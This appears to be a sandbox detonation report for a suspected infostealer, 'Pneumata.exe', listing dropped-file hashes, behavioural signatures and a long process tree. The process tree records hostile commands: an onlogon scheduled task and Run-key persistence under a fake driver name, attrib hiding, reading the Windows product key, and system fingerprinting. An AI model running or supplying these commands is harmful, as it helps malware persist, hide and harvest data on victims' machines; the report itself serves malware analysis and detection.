SHA1 fd5a535c04a4c8b369cbbe3b7ed28c2cd886b703
SHA256 927922d4cdb14553c6fb962e8a24507d78853a5e8f0fc7dd3d20c297ff12a7dd
SHA512 0446c348af7ddde162effebf2ebff8cecddbed7d86d0f64b54aa217e8246e9bb2843b7e8adb70b9db8ccae8b51196963d9e067a71afd4675d40ce7f68eafabbe

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\snapshot.exe

MD5 012f30fed381d9877cd99acc0a97ee2b
SHA1 419c1c6a1828e9d0594ae6a683637020a1dbdb24
SHA256 2589ab764f0a80875ba14db7cbea06b8cc1250350023b5f1df56875c65c57aa2
SHA512 a56c83c2aea1a2782818b8be86c5edf6b25514d4171481555cf29eeefbc53bb4544a76520c3e90271f5b17781e3b9d76cb15ee49acfce9cc878abe5b86ac9bbe

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe

MD5 471b15abc9f2e98fb7ed7361d3f045eb
SHA1 95b5798d80a9410872f6ed485ae2b43ca3745540
SHA256 7c262639cb22348dfd627dc07c76e8748e5bcacde2dcf1614773ab174c831004
SHA512 5b3b59aa1dbaef31b0ff6ccde082d7c312e39e311a46fe20d590d5d7765f934d3b663da9609ff4fb7beba2e8fa85376cf74f14ae077f3c0b49189cc28c30163a

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\StdUtils.dll

MD5 4f4d1098add7c5b145efbd4eee227153
SHA1 84bfefc39e2c40758e611b5db19cf9d6b72fd2a0
SHA256 360256e1166313ce7f166c1e01c529e06d5766a06075e73537385f37919a6cb0
SHA512 aa0730af8a4117e089cd1acd4fcef4cf9a5e589d41309cabe527f096bf864d85f914680b5e0eb94233f0e7d02e9fb7c04dc378920ced27940406108d855ccc4e

\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\StdUtils.dll

MD5 11a15b5c4cdf372558f58f21ebeb3b5b
SHA1 e32f56ebcda428542918285b8b473e9fdd6d4583
SHA256 1032bfa13ca7ad5b7e4c3469c5432f51622cd1ef952c29755ba47c471703a384
SHA512 dadc6c361db895316f6e36e8e1b69fbd87a27a0f4883d9e71809357896195d0d41339f282b984caa3cccfb18fd66f0cd10940bf4edb412ad7f51b91cd8d86345

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\swiftshader\libGLESv2.dll

MD5 79409aa7d4d2a928b52057261eea932c
SHA1 10c52c2bfbf9816a34113b13734e81a8cb0338f5
SHA256 2949e6105f63e46a1224022cdf981c0ff5658116ea00e159900f74603f0ce67e
SHA512 0f28fa3a853ee60836ba18e4c2a0326419255517ea513eb2e8b3d9d70cdb5f9ca4f07c3cff8a55850714c67763678757fbe711da7b19d624a6efcb11e1371492

\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe

MD5 df08acdd8506862c98df034ccd97a782
SHA1 1a95cecce223e7567e06e5cc18c019357fbe22c1
SHA256 ac4c5943cbfa183d12d04db2702ba1da130650fa6ea6e98c328e11ae9a000eb5
SHA512 4a40d8f766b02d0cc04f6c59a3127ace2cd843a32bf85f7fe405c3d8684aaaf4fbc8f341fdcb40309e242e21035f3dd310f59f208101be367af92a4dcdc28cd8

\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\ffmpeg.dll

MD5 98c9a431175a321fefe03e3801539491
SHA1 077e588425cbe5dfb2520bb42d8328c37209b40c
SHA256 d0b373afc6faad163827e4b7940400f1599bd8a6f16bc5aedd4258b798aa47cb
SHA512 a81d1d810382bfbb31a95d85c99934cc7b5fa23129645941776e0d691453e948f1db8f93495959dbfcdcb2d9a962f7f4fe123f0e01e35657e10321a0cc01401d

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\ffmpeg.dll

MD5 9b325a1fd6be0bc70b40cfd8c54d0328
SHA1 61678b53566d87fabb460b59dd30ed4aa9d54d5a
SHA256 404bed916f590144e938a46113c355be110f987986b1935ea403f72fdf5bf68c
SHA512 d6c9c92dfabc1cdec077546a6afb723a147c4ad936271b63c5048d69d2cfd1394975b71684978affc50d2c6d7044dfe36930ae9067f00b8b7805a546b6c0f9de

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe

MD5 114c049958707aa9ca8e5b62d1a47c8e
SHA1 20646c3c5696b595fa0a88fb06dafda2b1f30649
SHA256 fccd3b93dfd3287f18554a01c20b8e14d69bc3e492bf7ef21b5277aaf2185149
SHA512 7dc31e0e08acde7a07243629510a6891785337132d9f9f1b5b9697e9e5990839533865b59d9e08cb77d21fd893fe026a3675191a914f05a9e490b104d55bbe67

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\v8_context_snapshot.bin

MD5 47014c0f81bad6d216c617c9c63bf040
SHA1 7bb483fdc5fed3c6ed437d9fe6e5023bc38201bf
SHA256 e1249d05bfc73c645b27d269f47b6923b33a3cf8088a8ca78b3b637c90f58178
SHA512 052d86cf3305a9e493bd2472e6b7ddab5e0291efd6d899984a79bae46e5fa4bd21157e19ab4a2591c9cff9069de568bad18c7baf4f35d117c77134e635466f87

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\icudtl.dat

MD5 7414dccbce8c154625bd02a11442ca01
SHA1 c77dc2b0eedd0722b1f44b9950da10a940ef2800
SHA256 9e9fa7acf42b09fd45b53945e7ac32c54499e2e0d367d596883d612036056e14
SHA512 6581f0b18a8560f8f2e97300af3058aae0d345a8066592db22f9491d22ee11d53f316b6703e477eadf25e34c0a6da6e5292e03f7264bc710e4808df478e95fd8

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\resources\app.asar

MD5 a192a0827552fff39d08eb6107746f6d
SHA1 c896c28ab5f557d4b6e8b788823741c1d1a37ff7
SHA256 bf140cfbe92207e0c3ba97fca18846b6b3a4b3f01aa902ef6bcde75ff37cdf78
SHA512 8749feb5e34f11ef60607b7b88dd3ee777023c574c05c0161151a53d7ad9c3093f405158148f46703c5c11d2af0d250b5b6e7e4479793ad8f8491ae1b35e354c

\Users\Admin\AppData\Local\Temp\666a6179-ae9b-4f37-a571-0df3745de61f.tmp.node

MD5 a0028160552bb8d564491556977ca67d
SHA1 f6ea3621669ed0b895a11ee7d5b0f960847e03b6
SHA256 124cf8db61a8dd88fcf2a07df3e5c9fb5c5ed1e036c6a56084ae95491ec1e1cc
SHA512 d25f2d7019c7a5498966c05932838c8413e72201a8d4e2c155f1c9d627a277bd0dae687a9673d7565ede6d7076c2a6f0f0fbe4285a4437a47aa86097649ab763

\Users\Admin\AppData\Local\Temp\edea41eb-cf89-4362-b116-eeb3ccbe7a2b.tmp.node

MD5 2af0409312710d91462e2f193fa90c4f
SHA1 83175edaca4e22e43fa8023dbfa01b80a33de53c
SHA256 4cac3171e7241dc3de045613275273f11e68af73b4d77cf8ffb93c010efc3819
SHA512 22710f4952e6e75a6582f9b1aeaebada4290ba7013e08b093c626ce3c9307b194656b61516d45ff10c90ab297a4a27928b2622ceb3238b989cd9a987e078757d

memory/1100-580-0x0000000000060000-0x0000000000061000-memory.dmp

\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe

MD5 460a8dc4a396c2ca96837b95676b333f
SHA1 5ba575252e19525e7c1dd1280569c57ced5ebaa2
SHA256 72c6fb30b265446a17bde20ca1c7f067796f92bb29490f4bb72d65807c295d12
SHA512 5ff8821d36bc65fdc074e77e6c7a96449b83aa4f49ebb7b7bc1bf602c3427425e0d0d4130bf6533adf7fcebc9dd8d45e7f42bfe27d2230e86744f60d9bbf25e4

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\resources.pak

MD5 a0f6a41db9920f11432c88fb4bfb34b3
SHA1 55de71da12bd1a4a15b303529eacc61f8604b482
SHA256 441b313a3f0dd2c43d1c61b22847d22e40e8cc5f3f06a74673ed5dfc37656ec7
SHA512 7a12b9265d51bf4eba3a5f911cb201d7d578faabc2004e7e4558678fbc0ea29104dda594118de3ad955d034a0627a4bf1684f7ee28d9c34bc731e3e3728656da

memory/2288-625-0x0000000001F40000-0x0000000001F48000-memory.dmp

memory/2288-624-0x000000001B370000-0x000000001B652000-memory.dmp

memory/2288-626-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp

memory/2288-627-0x0000000002B70000-0x0000000002BF0000-memory.dmp

memory/2288-628-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp

memory/2288-629-0x0000000002B70000-0x0000000002BF0000-memory.dmp

memory/2288-630-0x0000000002B70000-0x0000000002BF0000-memory.dmp

memory/2288-631-0x0000000002B70000-0x0000000002BF0000-memory.dmp

memory/2288-634-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp

memory/2288-635-0x0000000002B70000-0x0000000002BF0000-memory.dmp

memory/2288-636-0x0000000002B70000-0x0000000002BF0000-memory.dmp

memory/2288-637-0x0000000002B70000-0x0000000002BF0000-memory.dmp

memory/2288-638-0x0000000002B70000-0x0000000002BF0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-17 00:23

Reported

2023-12-17 00:28

Platform

win10v2004-20231215-en

Max time kernel

16s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Pneumata.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Pneumata.exe N/A

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Pneumata.exe

"C:\Users\Admin\AppData\Local\Temp\Pneumata.exe"

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe

"C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1632 --field-trial-handle=1700,15986905126159184494,2064785458810304812,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe

"C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=1964 --field-trial-handle=1700,15986905126159184494,2064785458810304812,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=564 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=564 get ExecutablePath

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\resources\app.asar.unpacked\bind\main.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "net session"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption, osarchitecture

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get size

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\more.com

more +1

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController get name

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "echo %NUMBER_OF_PROCESSORS%"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get totalphysicalmemory | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get size"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=564 get ExecutablePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=564 get ExecutablePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupx9SxPW /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Pneumata.exe\" /F /rl highest"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupx9SxPW /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Pneumata.exe /f"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupx9SxPW /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Pneumata.exe /f

C:\Windows\system32\cmd.exe

cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupx9SxPW /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Pneumata.exe\" /F /rl highest

C:\Windows\system32\schtasks.exe

schtasks /create /sc onlogon /tn WindowsDriverSetupx9SxPW /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Pneumata.exe\" /F /rl highest

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Pneumata.exe\""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Pneumata.exe\"""

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Pneumata.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cscript.exe

cscript C:\Users\Admin\AppData\Roaming\HHbiOVOfXmnL.vbs

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cscript C:\Users\Admin\AppData\Roaming\HHbiOVOfXmnL.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""

C:\Windows\system32\cmd.exe

